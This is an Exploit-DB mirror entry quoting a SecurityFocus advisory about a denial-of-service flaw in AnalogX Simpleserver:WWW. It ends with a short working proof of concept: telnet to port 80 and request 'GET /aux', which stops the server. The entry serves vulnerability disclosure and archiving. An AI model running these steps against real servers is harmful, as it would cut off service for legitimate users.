exploit-db-mirror/exploits/windows/dos/20771.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

11 lines
No EOL
650 B
Text

source: https://www.securityfocus.com/bid/2608/info
Simpleserver:WWW is a freely available web server from AnalogX. Simpleserver:WWW is designed to provide an easy to use web server with a friendly interface.
A problem with the web server could lead to a Denial of Service to legitimate users. By connecting to the web server, and requesting an HTTP GET of the /aux directory, the web server ceases operation. A watchdog process or manual restart of the web server process is required.
Therefore, it is possible for remote users to deny service to legitimate users of the web server.
telnet vulnerable.web.server 80
GET /aux
then hit return twice